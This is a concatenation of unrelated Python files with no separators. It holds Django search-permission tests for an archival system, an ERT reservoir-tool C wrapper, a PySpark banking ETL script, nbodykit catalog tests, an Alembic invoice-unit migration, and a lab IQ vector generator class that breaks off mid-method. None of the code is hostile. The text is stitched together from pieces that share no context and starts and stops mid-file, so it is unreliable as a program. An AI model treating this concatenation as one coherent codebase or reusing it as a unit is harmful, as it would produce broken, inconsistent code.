            self.assertEqual(res.status_code, status.HTTP_200_OK)
            self.assertEqual(len(res.data['hits']), 0)

        with self.subTest('2020-01-01 not between 2019-01-01 and 2019-12-31'):
            res = self.client.get(self.url, data={
                'appraisal_date_after': '2019-01-01',
                'appraisal_date_before': '2019-12-31',
            })
            self.assertEqual(res.status_code, status.HTTP_200_OK)
            self.assertEqual(len(res.data['hits']), 0)

        with self.subTest('invalid range 2020-12-31 - 2020-01-01'):
            # An after-date later than the before-date is rejected outright.
            res = self.client.get(self.url, data={
                'appraisal_date_after': '2020-12-31',
                'appraisal_date_before': '2020-01-01',
            })
            self.assertEqual(res.status_code, status.HTTP_400_BAD_REQUEST)

    def test_add_results_to_appraisal(self):
        """Search results (tags only, not structure units) can be added to an appraisal job."""
        component_tag = Tag.objects.create()
        component_tag_version = TagVersion.objects.create(
            name='foo',
            tag=component_tag,
            type=self.component_type,
            elastic_index="component",
        )
        Component.from_obj(component_tag_version).save(refresh='true')

        component_tag2 = Tag.objects.create()
        component_tag_version2 = TagVersion.objects.create(
            name='bar',
            tag=component_tag2,
            type=self.component_type,
            elastic_index="component",
        )
        Component.from_obj(component_tag_version2).save(refresh='true')

        # test that we don't try to add structure units matched by query to job
        structure = Structure.objects.create(type=StructureType.objects.create(), is_template=False)
        structure_unit = StructureUnit.objects.create(
            name='foo',
            structure=structure, type=StructureUnitType.objects.create(structure_type=structure.type),
        )
        StructureUnitDocument.from_obj(structure_unit).save(refresh='true')

        appraisal_job = AppraisalJob.objects.create()
        # Query 'foo' matches one tag and the structure unit; only the tag is added.
        res = self.client.get(self.url, data={
            'q': 'foo',
            'add_to_appraisal': appraisal_job.pk
        })
        self.assertEqual(res.status_code, status.HTTP_200_OK)
        self.assertCountEqual(appraisal_job.tags.all(), [component_tag])

        # An empty query matches everything; adding is cumulative.
        res = self.client.get(self.url, data={
            'add_to_appraisal': appraisal_job.pk
        })
        self.assertEqual(res.status_code, status.HTTP_200_OK)
        self.assertCountEqual(appraisal_job.tags.all(), [component_tag, component_tag2])

class DocumentSearchTestCase(ESSArchSearchBaseTestCase):
    """Tests for document visibility based on IP responsibility and permissions."""

    fixtures = ['countries_data', 'languages_data']

    @classmethod
    def setUpTestData(cls):
        cls.url = reverse('search-list')
        Feature.objects.create(name='archival descriptions', enabled=True)

        org_group_type = GroupType.objects.create(codename='organization')
        cls.group = Group.objects.create(group_type=org_group_type)
        cls.component_type = TagVersionType.objects.create(name='component', archive_type=False)
        cls.archive_type = TagVersionType.objects.create(name='archive', archive_type=True)

    def setUp(self):
        super().setUp()

        # A fresh user per test: permissions granted in one test must not leak.
        permission = Permission.objects.get(codename='search')
        self.user = User.objects.create()
        self.user.user_permissions.add(permission)
        self.group.add_member(self.user.essauth_member)

        self.client.force_authenticate(user=self.user)

    def test_search_document_in_ip_with_other_user_responsible_without_permission_to_see_it(self):
        """Documents in another user's IP are hidden without the extra permission."""
        other_user = User.objects.create(username='other')
        self.group.add_member(other_user.essauth_member)

        ip = InformationPackage.objects.create(responsible=other_user)
        self.group.add_object(ip)

        document_tag = Tag.objects.create(information_package=ip)
        document_tag_version = TagVersion.objects.create(
            tag=document_tag,
            type=self.component_type,
            elastic_index="document",
        )
        File.from_obj(document_tag_version).save(refresh='true')

        res = self.client.get(self.url)
        self.assertEqual(res.status_code, status.HTTP_200_OK)
        self.assertEqual(len(res.data['hits']), 0)

    def test_search_document_in_ip_with_other_user_responsible_with_permission_to_see_it(self):
        """The see_other_user_ip_files permission exposes other users' IP documents."""
        self.user.user_permissions.add(Permission.objects.get(codename='see_other_user_ip_files'))

        other_user = User.objects.create(username='other')
        self.group.add_member(other_user.essauth_member)

        ip = InformationPackage.objects.create(responsible=other_user)
        self.group.add_object(ip)

        document_tag = Tag.objects.create(information_package=ip)
        document_tag_version = TagVersion.objects.create(
            tag=document_tag,
            type=self.component_type,
            elastic_index="document",
        )
        File.from_obj(document_tag_version).save(refresh='true')

        res = self.client.get(self.url)
        self.assertEqual(res.status_code, status.HTTP_200_OK)
        self.assertEqual(len(res.data['hits']), 1)
        self.assertEqual(res.data['hits'][0]['_id'], str(document_tag_version.pk))


class SecurityLevelTestCase(ESSArchSearchBaseTestCase):
    """Tests that search hits are filtered by the user's security_level_N permissions."""

    fixtures = ['countries_data', 'languages_data']

    @classmethod
    def setUpTestData(cls):
        cls.url = reverse('search-list')
        Feature.objects.create(name='archival descriptions', enabled=True)
        cls.component_type = TagVersionType.objects.create(name='component', archive_type=False)
        # All security levels the system distinguishes.
        cls.security_levels = [1, 2, 3, 4, 5]

    def setUp(self):
        super().setUp()

        self.user = User.objects.create()
        permission = Permission.objects.get(codename='search')
        self.user.user_permissions.add(permission)
        self.client.force_authenticate(user=self.user)

    def test_user_with_no_security_level(self):
        """Without any level permission, only unclassified documents are visible."""
        component_tag = Tag.objects.create()
        component_tag_version = TagVersion.objects.create(
            tag=component_tag,
            type=self.component_type,
            elastic_index="component",
            security_level=None,
        )
        Component.from_obj(component_tag_version).save(refresh='true')

        with self.subTest('no security level'):
            res = self.client.get(self.url)
            self.assertEqual(res.status_code, status.HTTP_200_OK)
            self.assertEqual(len(res.data['hits']), 1)
            self.assertEqual(res.data['hits'][0]['_id'], str(component_tag_version.pk))

        # NOTE: iterates levels 2-5 only (self.security_levels[1:]).
        for lvl in self.security_levels[1:]:
            with self.subTest(f'security level {lvl}'):
                component_tag_version.security_level = lvl
                component_tag_version.save()
                Component.from_obj(component_tag_version).save(refresh='true')

                res = self.client.get(self.url)
                self.assertEqual(res.status_code, status.HTTP_200_OK)
                self.assertEqual(len(res.data['hits']), 0)

    def test_user_with_security_level_3(self):
        """With security_level_3, only level-3 and unclassified documents are visible."""
        self.user.user_permissions.add(Permission.objects.get(codename='security_level_3'))
        # Re-fetch to drop the cached permission set on the user instance.
        self.user = User.objects.get(pk=self.user.pk)

        component_tag = Tag.objects.create()
        component_tag_version = TagVersion.objects.create(
            tag=component_tag,
            type=self.component_type,
            elastic_index="component",
            security_level=None,
        )
        Component.from_obj(component_tag_version).save(refresh='true')

        with self.subTest('no security level'):
            res = self.client.get(self.url)
            self.assertEqual(res.status_code, status.HTTP_200_OK)
            self.assertEqual(len(res.data['hits']), 1)
            self.assertEqual(res.data['hits'][0]['_id'], str(component_tag_version.pk))

        for lvl in self.security_levels:
            with self.subTest(f'security level {lvl}'):
                component_tag_version.security_level = lvl
                component_tag_version.save()
                Component.from_obj(component_tag_version).save(refresh='true')

                if lvl == 3:
                    res = self.client.get(self.url)
                    self.assertEqual(res.status_code, status.HTTP_200_OK)
                    self.assertEqual(len(res.data['hits']), 1)
                    self.assertEqual(res.data['hits'][0]['_id'], str(component_tag_version.pk))
                else:
                    res = self.client.get(self.url)
                    self.assertEqual(res.status_code, status.HTTP_200_OK)
                    self.assertEqual(len(res.data['hits']), 0)

    def test_user_with_multiple_security_levels(self):
        """With levels 1 and 3, documents at either level (or unclassified) are visible."""
        self.user.user_permissions.add(
            Permission.objects.get(codename='security_level_1'),
            Permission.objects.get(codename='security_level_3'),
        )
        # Re-fetch to drop the cached permission set on the user instance.
        self.user = User.objects.get(pk=self.user.pk)

        component_tag = Tag.objects.create()
        component_tag_version = TagVersion.objects.create(
            tag=component_tag,
            type=self.component_type,
            elastic_index="component",
            security_level=None,
        )
        Component.from_obj(component_tag_version).save(refresh='true')

        with self.subTest('no security level'):
            res = self.client.get(self.url)
            self.assertEqual(res.status_code, status.HTTP_200_OK)
            self.assertEqual(len(res.data['hits']), 1)
            self.assertEqual(res.data['hits'][0]['_id'], str(component_tag_version.pk))

        for lvl in self.security_levels:
            with self.subTest(f'security level {lvl}'):
                component_tag_version.security_level = lvl
                component_tag_version.save()
                Component.from_obj(component_tag_version).save(refresh='true')

                if lvl in [1, 3]:
                    res = self.client.get(self.url)
                    self.assertEqual(res.status_code, status.HTTP_200_OK)
                    self.assertEqual(len(res.data['hits']), 1)
                    self.assertEqual(res.data['hits'][0]['_id'], str(component_tag_version.pk))
                else:
                    res = self.client.get(self.url)
                    self.assertEqual(res.status_code, status.HTTP_200_OK)
                    self.assertEqual(len(res.data['hits']), 0)

#  Copyright (C) 2012  Statoil ASA, Norway. 
#   
#  The file 'enkf_node.py' is part of ERT - Ensemble based Reservoir Tool. 
#   
#  ERT is free software: you can redistribute it and/or modify 
#  it under the terms of the GNU General Public License as published by 
#  the Free Software Foundation, either version 3 of the License, or 
#  (at your option) any later version. 
#   
#  ERT is distributed in the hope that it will be useful, but WITHOUT ANY 
#  WARRANTY; without even the implied warranty of MERCHANTABILITY or 
#  FITNESS FOR A PARTICULAR PURPOSE.   
#   
#  See the GNU General Public License at <http://www.gnu.org/licenses/gpl.html> 
#  for more details.
from ert.cwrap import BaseCClass, CWrapper
from ert.enkf import ENKF_LIB, EnkfFs, NodeId
from ert.enkf.data import EnkfConfigNode, GenKw, GenData, CustomKW
from ert.enkf.enums import ErtImplType

class EnkfNode(BaseCClass):
    """Python wrapper around the C-level ``enkf_node`` object.

    Instances own the underlying C pointer (passed ``True`` to the base
    constructor) and release it through the bound ``enkf_node_free``
    prototype registered at module level.
    """

    def __init__(self, config_node, private=False):
        # A node is always created from the EnkfConfigNode describing its type.
        assert isinstance(config_node, EnkfConfigNode)

        if private:
            # Private container nodes use a dedicated C allocator.
            c_pointer = EnkfNode.cNamespace().alloc_private(config_node)
        else:
            c_pointer = EnkfNode.cNamespace().alloc(config_node)

        # Final ``True`` marks this wrapper as the owner of the pointer.
        super(EnkfNode, self).__init__(c_pointer, config_node, True)

    def valuePointer(self):
        # Raw pointer to the node's value buffer; consumed by the as*() casts.
        return EnkfNode.cNamespace().value_ptr(self)

    def asGenData(self):
        """ @rtype: GenData """
        # Only valid for GEN_DATA nodes; asserted before the unchecked C cast.
        impl_type = EnkfNode.cNamespace().get_impl_type(self)
        assert impl_type == ErtImplType.GEN_DATA

        return GenData.createCReference(self.valuePointer(), self)

    def asGenKw(self):
        """ @rtype: GenKw """
        impl_type = EnkfNode.cNamespace().get_impl_type(self)
        assert impl_type == ErtImplType.GEN_KW

        return GenKw.createCReference(self.valuePointer(), self)

    def asCustomKW(self):
        """ @rtype: CustomKW """
        impl_type = EnkfNode.cNamespace().get_impl_type(self)
        assert impl_type == ErtImplType.CUSTOM_KW

        return CustomKW.createCReference(self.valuePointer(), self)

    def tryLoad(self, fs, node_id):
        """
        Attempt to load this node's value from storage; False on failure.

        @type fs: EnkfFS
        @type node_id: NodeId
        @rtype: bool
        """
        assert isinstance(fs, EnkfFs)
        assert isinstance(node_id, NodeId)

        return EnkfNode.cNamespace().try_load(self, fs, node_id)

    def name(self):
        # The node's key as stored in the C layer.
        return EnkfNode.cNamespace().get_name(self)

    def load(self, fs, node_id):
        # Like tryLoad(), but raises instead of returning False.
        if not self.tryLoad(fs, node_id):
            raise Exception("Could not load node: %s iens: %d report: %d" % (self.name(), node_id.iens, node_id.report_step))

    def save(self, fs, node_id):
        # Persist the node's current value to storage.
        assert isinstance(fs, EnkfFs)
        assert isinstance(node_id, NodeId)

        EnkfNode.cNamespace().store(self, fs, True, node_id)

    def free(self):
        # Called by the BaseCClass machinery when the wrapper is destroyed.
        EnkfNode.cNamespace().free(self)


# Register the Python class with the C wrapper so "enkf_node" can appear
# in prototype signatures, then bind each C function used by EnkfNode.
cwrapper = CWrapper(ENKF_LIB)
cwrapper.registerObjectType("enkf_node", EnkfNode)

# Lifecycle: allocation, private-container allocation, destruction, key lookup.
EnkfNode.cNamespace().free = cwrapper.prototype("void enkf_node_free(enkf_node)")
EnkfNode.cNamespace().alloc = cwrapper.prototype("c_void_p enkf_node_alloc(enkf_node)")
EnkfNode.cNamespace().alloc_private = cwrapper.prototype("c_void_p enkf_node_alloc_private_container(enkf_node)")
EnkfNode.cNamespace().get_name = cwrapper.prototype("char* enkf_node_get_key(enkf_node)")

# Access to the raw value buffer (used by the as*() typed casts).
EnkfNode.cNamespace().value_ptr = cwrapper.prototype("c_void_p enkf_node_value_ptr(enkf_node)")

# Storage I/O and run-time type inspection.
EnkfNode.cNamespace().try_load = cwrapper.prototype("bool enkf_node_try_load(enkf_node, enkf_fs, node_id)")
EnkfNode.cNamespace().get_impl_type = cwrapper.prototype("ert_impl_type_enum enkf_node_get_impl_type(enkf_node)")
EnkfNode.cNamespace().store = cwrapper.prototype("void enkf_node_store(enkf_node, enkf_fs, bool, node_id)")

#coding=UTF-8
from pyspark import SparkContext, SparkConf, SQLContext, Row, HiveContext
from pyspark.sql.types import *
from datetime import date, datetime, timedelta
import sys, re, os

st = datetime.now()  # wall-clock start; used in the timing report at the end
conf = SparkConf().setAppName('PROC_A_SUBJECT_D002015').setMaster(sys.argv[2])
sc = SparkContext(conf = conf)
sc.setLogLevel('WARN')
# Select the SQL context implementation. BUG FIX: the original only assigned
# sqlContext when argv[5] == "hive" or when fewer than six arguments were
# given; any other sixth argument left sqlContext unassigned and the script
# crashed later with a NameError. Fall back to a plain SQLContext instead.
if len(sys.argv) > 5 and sys.argv[5] == "hive":
    sqlContext = HiveContext(sc)
else:
    sqlContext = SQLContext(sc)
hdfs = sys.argv[3]      # HDFS base path for input/output parquet files
dbname = sys.argv[4]    # database name used when deleting stale output

# Dates needed by this run
etl_date = sys.argv[1]
# ETL date (yyyymmdd)
V_DT = etl_date
# Previous day
V_DT_LD = (date(int(etl_date[0:4]), int(etl_date[4:6]), int(etl_date[6:8])) + timedelta(-1)).strftime("%Y%m%d")
# First day of the month
V_DT_FMD = date(int(etl_date[0:4]), int(etl_date[4:6]), 1).strftime("%Y%m%d")
# Last day of the previous month
V_DT_LMD = (date(int(etl_date[0:4]), int(etl_date[4:6]), 1) + timedelta(-1)).strftime("%Y%m%d")
# 10-character date (yyyy-mm-dd)
V_DT10 = (date(int(etl_date[0:4]), int(etl_date[4:6]), int(etl_date[6:8]))).strftime("%Y-%m-%d")
V_STEP = 0  # step counter for progress reporting

# Load the source table and expose it to Spark SQL.
ACRM_F_CI_ASSET_BUSI_PROTO = sqlContext.read.parquet(hdfs+'/ACRM_F_CI_ASSET_BUSI_PROTO/*')
ACRM_F_CI_ASSET_BUSI_PROTO.registerTempTable("ACRM_F_CI_ASSET_BUSI_PROTO")

# Task [21] 001-01:: aggregate index D002015 per customer
V_STEP = V_STEP + 1

sql = """
 SELECT  CAST(A.CUST_ID AS VARCHAR(32))              AS CUST_ID 
		,CAST('' AS VARCHAR(20)) AS ORG_ID							--插入的空值，包顺龙2017/05/13
		,CAST('D002015' AS VARCHAR(20))               AS INDEX_CODE
		,CAST(SUM(TAKE_CGT_LINE) AS DECIMAL(22,2))                      AS INDEX_VALUE
       ,CAST(SUBSTR(V_DT, 1, 7)   AS VARCHAR(7))                    AS YEAR_MONTH 
        ,CAST(V_DT AS DATE)                   AS ETL_DATE 
        ,CAST(A.CUST_TYP AS VARCHAR(5))             AS CUST_TYPE 
       ,CAST(A.FR_ID AS  VARCHAR(5))              AS FR_ID 
        FROM ACRM_F_CI_ASSET_BUSI_PROTO A                           
  WHERE A.BAL > 0 
    AND A.LN_APCL_FLG           = 'N' 
    AND(A.PRODUCT_ID LIKE '1010%' 
             OR A.PRODUCT_ID LIKE '1030%' 
             OR A.PRODUCT_ID LIKE '1040%' 
             OR A.PRODUCT_ID LIKE '1050%' 
             OR A.PRODUCT_ID LIKE '1060%' 
             OR A.PRODUCT_ID LIKE '1070%' 
             OR A.PRODUCT_ID LIKE '2010%' 
             OR A.PRODUCT_ID LIKE '2020%' 
             OR A.PRODUCT_ID LIKE '2030%' 
             OR A.PRODUCT_ID LIKE '2040%' 
             OR A.PRODUCT_ID LIKE '2050%') 
  GROUP BY A.CUST_ID 
       ,A.CUST_TYP 
       ,A.FR_ID """

# Substitute the literal ETL date for every whole-word V_DT in the query.
sql = re.sub(r"\bV_DT\b", "'"+V_DT10+"'", sql)
ACRM_A_TARGET_D002015 = sqlContext.sql(sql)
ACRM_A_TARGET_D002015.registerTempTable("ACRM_A_TARGET_D002015")
dfn="ACRM_A_TARGET_D002015/"+V_DT+".parquet"
# Cache so count() and write() do not recompute the query twice.
ACRM_A_TARGET_D002015.cache()
nrows = ACRM_A_TARGET_D002015.count()
ACRM_A_TARGET_D002015.write.save(path=hdfs + '/' + dfn, mode='overwrite')
ACRM_A_TARGET_D002015.unpersist()
ACRM_F_CI_ASSET_BUSI_PROTO.unpersist()
# Drop the previous day's output now that today's run succeeded.
ret = os.system("hdfs dfs -rm -r /"+dbname+"/ACRM_A_TARGET_D002015/"+V_DT_LD+".parquet")
et = datetime.now()
# BUG FIX: the original wrote ``print("fmt") % (args)`` which only parsed as
# intended under the Python 2 print *statement*; with print as a function it
# raises TypeError. Format inside the call instead (works under both).
print("Step %d start[%s] end[%s] use %d seconds, insert ACRM_A_TARGET_D002015 lines %d" % (V_STEP, st.strftime("%H:%M:%S"), et.strftime("%H:%M:%S"), (et-st).seconds, nrows))

from runtests.mpi import MPITest
from nbodykit.lab import *
from nbodykit import setup_logging
from numpy.testing import assert_allclose
import tempfile
import os

@MPITest([1])
def test_hdf(comm):
    """HDFCatalog reads a structured dataset and serves row-range queries."""

    import h5py

    # fake structured array
    dset = numpy.empty(1024, dtype=[('Position', ('f8', 3)), ('Mass', 'f8')])
    dset['Position'] = numpy.random.random(size=(1024, 3))
    dset['Mass'] = numpy.random.random(size=1024)

    # FIX: mkstemp() returns an open OS-level descriptor; close it so the
    # fd is not leaked (the original discarded it with mkstemp()[1]).
    fd, tmpfile = tempfile.mkstemp()
    os.close(fd)

    with h5py.File(tmpfile, 'w') as ff:
        ds = ff.create_dataset('X', data=dset)  # store structured array as dataset
        ds.attrs['BoxSize'] = 1.0
        grp = ff.create_group('Y')
        grp.create_dataset('Position', data=dset['Position'])  # column as dataset
        grp.create_dataset('Mass', data=dset['Mass'])  # column as dataset

    # catalog built from the structured dataset must round-trip the data
    source = HDFCatalog(tmpfile, dataset='X', attrs={"Nmesh": 32}, comm=comm)
    assert_allclose(source['Position'], dset['Position'])

    # a row-range query returns exactly that slice
    region = source.query_range(32, 64)
    assert_allclose(region['Position'], dset['Position'][32:64])

    os.unlink(tmpfile)

@MPITest([1, 4])
def test_query_range(comm):
    """query_range returns the requested global row slice across all ranks."""

    import h5py

    # fake structured array
    dset = numpy.empty(1024, dtype=[('Position', ('f8', 3)), ('Mass', 'f8'), ('Index', 'i8')])
    dset['Index'] = numpy.arange(1024)
    dset['Position'] = numpy.random.random(size=(1024, 3))
    dset['Mass'] = numpy.random.random(size=1024)

    if comm.rank == 0:
        # FIX: close the descriptor returned by mkstemp() instead of
        # leaking it (the original discarded it with mkstemp()[1]).
        fd, tmpfile = tempfile.mkstemp()
        os.close(fd)

        with h5py.File(tmpfile, 'w') as ff:
            ds = ff.create_dataset('X', data=dset)  # store structured array as dataset
            ds.attrs['BoxSize'] = 1.0

        # collective broadcast, matched by the bcast in the else branch
        tmpfile = comm.bcast(tmpfile)
    else:
        tmpfile = comm.bcast(None)

    source = HDFCatalog(tmpfile, dataset='X', attrs={"Nmesh": 32}, comm=comm)

    # NOTE(review): the gslice() result was never asserted against in the
    # original; the call is kept for behavioral parity — confirm and remove.
    correct_region = source.gslice(32, 64)
    region = source.query_range(32, 64)

    # gathering the Index column across ranks must yield exactly 32..63
    assert_allclose(
        numpy.concatenate(comm.allgather(region['Index'].compute())),
        numpy.arange(32, 64)
    )

    if comm.rank == 0:
        os.unlink(tmpfile)

@MPITest([1])
def test_csv(comm):
    """Round-trip a small random table through CSVCatalog and verify columns."""

    column_names = ['a', 'b', 'c', 'd', 'e']

    with tempfile.NamedTemporaryFile() as tmp:
        # write random data as text and rewind so the catalog can read it
        expected = numpy.random.random(size=(100, 5))
        numpy.savetxt(tmp, expected, fmt='%.7e')
        tmp.seek(0)

        catalog = CSVCatalog(tmp.name, column_names, blocksize=100, comm=comm)

        # every column must match what was written
        for idx, col in enumerate(column_names):
            numpy.testing.assert_almost_equal(expected[:, idx], catalog[col].compute(), decimal=7)

        # and no column may be missing from the catalog
        assert all(col in catalog for col in column_names)

@MPITest([1])
def test_stack_glob(comm):
    """CSVCatalog stacks multiple files matched by a glob pattern."""

    tmpfile1 = 'test-glob-1.dat'
    tmpfile2 = 'test-glob-2.dat'

    # generate data
    data = numpy.random.random(size=(100, 5))

    # FIX: clean up the files even when an assertion fails; the original
    # leaked them on failure, which would poison later glob-based runs.
    try:
        numpy.savetxt(tmpfile1, data, fmt='%.7e')
        numpy.savetxt(tmpfile2, data, fmt='%.7e')

        # read using a glob
        names = ['a', 'b', 'c', 'd', 'e']
        f = CSVCatalog('test-glob-*', names, blocksize=100, comm=comm)

        # make sure print works
        print(f)

        # the catalog must contain both copies, concatenated in order
        fulldata = numpy.concatenate([data, data], axis=0)
        for i, name in enumerate(names):
            numpy.testing.assert_almost_equal(fulldata[:, i], f[name].compute(), decimal=7)

        # make sure all the columns are there
        assert all(col in f for col in names)
    finally:
        for path in (tmpfile1, tmpfile2):
            if os.path.exists(path):
                os.unlink(path)

@MPITest([1])
def test_stack_list(comm):
    """CSVCatalog stacks multiple files given as an explicit list of paths."""

    tmpfile1 = 'test-list-1.dat'
    tmpfile2 = 'test-list-2.dat'

    # generate data
    data = numpy.random.random(size=(100, 5))

    # FIX: clean up the files even when an assertion fails; the original
    # leaked them on failure.
    try:
        numpy.savetxt(tmpfile1, data, fmt='%.7e')
        numpy.savetxt(tmpfile2, data, fmt='%.7e')

        # read using an explicit file list
        names = ['a', 'b', 'c', 'd', 'e']
        f = CSVCatalog(['test-list-1.dat', 'test-list-2.dat'], names, blocksize=100, comm=comm)

        # make sure print works
        print(f)

        # the catalog must contain both copies, concatenated in order
        fulldata = numpy.concatenate([data, data], axis=0)
        for i, name in enumerate(names):
            numpy.testing.assert_almost_equal(fulldata[:, i], f[name].compute(), decimal=7)

        # make sure all the columns are there
        assert all(col in f for col in names)
    finally:
        for path in (tmpfile1, tmpfile2):
            if os.path.exists(path):
                os.unlink(path)

"""1.5 : Migrating work unity

Revision ID: 1212f113f03b
Revises: 1f07ae132ac8
Create Date: 2013-01-21 11:53:56.598914

"""

# revision identifiers, used by Alembic.
revision = '1212f113f03b'
down_revision = '1f07ae132ac8'

from alembic import op
import sqlalchemy as sa


# Internal work-unit codes mapped to the French labels shown to users.
UNITIES = {
    "NONE": "",
    "HOUR": u"heure(s)",
    "DAY": u"jour(s)",
    "WEEK": u"semaine(s)",
    "MONTH": u"mois",
    "FEUIL": u"feuillet(s)",
    "PACK": u"forfait",
}

# Labels seeded into the WorkUnit table by the upgrade step below.
UNITS = (u"heure(s)",
         u"jour(s)", u"semaine(s)", u"mois", u"forfait", u"feuillet(s)",)

def translate_unity(unity):
    """Return the French label for the unit code *unity* ("" when unknown)."""
    fallback = UNITIES["NONE"]
    return UNITIES.get(unity, fallback)

def translate_inverse(unity):
    """Return the unit code whose label equals *unity* (u"NONE" when none matches)."""
    for code, label in UNITIES.items():
        if label == unity:
            return code
    return u"NONE"

def upgrade():
    """Widen the `unity` columns, seed the WorkUnit table and rewrite each
    line's unit code (e.g. "HOUR") as its French label ("heure(s)")."""
    from autonomie.models.task import WorkUnit
    from autonomie.models.task.estimation import EstimationLine
    from autonomie.models.task.invoice import InvoiceLine
    from autonomie.models.task.invoice import CancelInvoiceLine
    from autonomie_base.models.base import DBSESSION
    # Adding some characters to the Lines
    for table in "estimation_line", "invoice_line", "cancelinvoice_line":
        op.alter_column(table, "unity", type_=sa.String(100))

    # seed the configurable work-unit table with every known label
    for value in UNITS:
        unit = WorkUnit(label=value)
        DBSESSION().add(unit)
    # convert stored unit codes to display labels on every line type
    for factory in (EstimationLine, InvoiceLine, CancelInvoiceLine):
        for line in factory.query():
            line.unity = translate_unity(line.unity)
            DBSESSION().merge(line)

def downgrade():
    """Reverse of upgrade: map labels back to unit codes and empty the
    WorkUnit table."""
    from autonomie.models.task import WorkUnit
    from autonomie.models.task.estimation import EstimationLine
    from autonomie.models.task.invoice import InvoiceLine
    from autonomie.models.task.invoice import CancelInvoiceLine
    from autonomie_base.models.base import DBSESSION
    # convert display labels back to internal unit codes
    for factory in (EstimationLine, InvoiceLine, CancelInvoiceLine):
        for line in factory.query():
            line.unity = translate_inverse(line.unity)
            DBSESSION().merge(line)
    # drop the seeded work units (column width change is not reverted)
    for value in WorkUnit.query():
        DBSESSION().delete(value)

from math import ceil

import numpy as np
from ipywidgets import widgets
from tqdm.notebook import tqdm
from matplotlib import pyplot as plt

import lib.iq_mixer_calibration
from drivers import IQAWG
from lib.data_management import load_IQMX_calibration_database, \
    save_IQMX_calibration
from lib.iq_mixer_calibration import IQCalibrator


class IQVectorGenerator:
    """
    Vector microwave source built from a local oscillator (LO), an AWG
    driving an IQ mixer, and a spectrum analyzer used for calibration.

    Single-sideband output at the requested frequency is produced by tuning
    the LO to ``frequency + if_frequency`` and continuously replaying an IF
    sine through a stored IQ mixer calibration.  Calibrations live in a
    database on a frequency grid with ``calibration_step`` spacing and are
    amplitude-rescaled to the requested output power.
    """

    def __init__(self, name, lo, iq_awg: IQAWG, sa, calibration_db_name="IQVG",
                 default_calibration_power=-30, marker_period_divisor=None,
                 slave_iqvgs=None, calibration_step=10e6):
        """

        Parameters
        ----------
        name : str
            identifier used in warnings and log messages
        lo
            local oscillator (microwave source) driver
        iq_awg
            AWG driving the IQ mixer
        sa
            spectrum analyzer used during mixer calibration
        calibration_db_name : str
            name of the calibration database
        default_calibration_power : float, dBm
            SSB power at which mixer calibrations are performed; output power
            may be requested up to 10 dBm above this value
        marker_period_divisor: int, ns
            by default, the marker period should be divisible by the if_period
            however, in some cases other divisor may be required, i.e. when
            m3202 is used with PXICLK10 trigger sync mode this divisor
            should be set to 100
        slave_iqvgs : list, optional
            other IQVectorGenerators whose marker periods must stay in sync
            with this one (e.g. when they share the same AWG)
        calibration_step : float, Hz
            spacing of the calibration frequency grid
        """
        self._name = name
        self._lo = lo
        self._iqawg = iq_awg
        self._sa = sa
        self._cal_db_name = calibration_db_name
        self._default_calibration_power = default_calibration_power
        self._calibration_widget = widgets.HTML()
        self._recalibrate_mixer = False
        self._frequency = 5e9
        self.set_if_frequency(100e6)
        if marker_period_divisor is not None:
            self._marker_period_divisor = marker_period_divisor
        else:
            self._marker_period_divisor = self._if_period
        # for marker period synchronization when iqvgs are on the same AWG
        self._slave_iqvgs = slave_iqvgs if slave_iqvgs is not None else []

        self._power = default_calibration_power
        self._dac_overridden = False
        self._current_cal = None
        self._requested_cal: lib.iq_mixer_calibration.IQCalibrationData = None
        self._cal_db = None

        self._marker_period = None
        self._requested_marker_period = None
        self.set_marker_period(1000)
        self._calibration_initial_guess = {"dc_offsets": np.random.uniform(.03, 0.1, size=2),
                                           "if_amplitudes": (.1, .1),
                                           "if_phase": -np.pi * 0.54}
        self._calibration_step = calibration_step
        self._calibration_test_data = []
        self._load_cal_db()

    def get_calibration_widget(self):
        """Return the HTML widget that displays calibration progress."""
        return self._calibration_widget

    def set_parameters(self, parameters_dict):
        """Apply a settings dict; recognized keys are "power", "freq" and
        "dac_overridden" (the latter defaults to False when absent)."""
        if "power" in parameters_dict:
            self.set_power(parameters_dict["power"])

        if "freq" in parameters_dict:
            self.set_frequency(parameters_dict["freq"])

        if "dac_overridden" in parameters_dict:
            self._dac_overridden = parameters_dict["dac_overridden"]
        else:
            self._dac_overridden = False

    def get_iqawg(self):
        """Return the underlying IQAWG, first pushing the currently loaded
        calibration into it."""
        self._iqawg.set_parameters(
            {'calibration': self._current_cal})  # ensure
        return self._iqawg

    def set_if_frequency(self, if_frequency):
        """Set the intermediate frequency [Hz] and cache its period in ns."""
        self._if_frequency = if_frequency
        self._if_period = 1 / if_frequency * 1e9  # ns

    def get_if_frequency(self):
        """Return the intermediate frequency in Hz."""
        return self._if_frequency

    def set_output_state(self, state):
        """Forward the output on/off state to the local oscillator."""
        self._lo.set_output_state(state)

    def set_frequency(self, freq):
        """Set the output frequency [Hz], retune the LO and refresh the
        SSB output with the matching calibration."""
        self._frequency = freq
        self._lo.set_frequency(self._frequency + self._if_frequency)
        self._requested_cal = self.get_calibration(self._frequency,
                                                   self._power)
        self._output_SSB()

    def set_power(self, power):
        """Set the output power [dBm].

        Raises
        ------
        ValueError
            if `power` exceeds the default calibration power by more than
            10 dBm (calibration rescaling is not trusted beyond that).
        """
        if power > self._default_calibration_power + 10:
            # fixed format string: was "% dBm max", where "% d" swallowed the
            # literal "d" as a conversion and garbled the message
            raise ValueError("Power can be %d dBm max, requested %d dBm" % (
                self._default_calibration_power + 10, power))

        self._power = power
        self._requested_cal = self.get_calibration(self._frequency,
                                                   self._power)
        self._lo.set_power(self._requested_cal.get_lo_power())
        self._output_SSB()

    def get_power(self):
        """Return the requested output power in dBm."""
        return self._power

    def set_marker_period(self, marker_period):
        '''
        For some applications there is need to control the length of the interval between triggers
        output by the AWG of the IQVectorGenerator.

        Parameters
        ----------
        marker_period: ns, float
            real trigger period will be recalculated to be not shorter than <marker_period> ns,
            but still divisible by the IF period
        '''
        self._requested_marker_period = marker_period
        # round up to the next multiple of the divisor
        correct_marker_period = ceil(
            marker_period / self._marker_period_divisor) * \
                                self._marker_period_divisor

        if correct_marker_period != self._marker_period:
            self._marker_period = correct_marker_period
            if self._requested_cal is not None:
                # force _output_SSB to re-upload the waveform
                self._current_cal = None
                self._output_SSB()

        # keep generators sharing the same AWG in lockstep
        for slave_iqvg in self._slave_iqvgs:
            slave_iqvg.set_marker_period(self._marker_period)

    def _output_SSB(self):
        """Upload and start the continuous IF sine if the requested
        calibration differs from the one currently loaded."""
        if self._requested_cal != self._current_cal:
            self._iqawg.set_parameters({"calibration": self._requested_cal})
            pb = self._iqawg.get_pulse_builder()
            if_freq = self._requested_cal.get_radiation_parameters()[
                "if_frequency"]
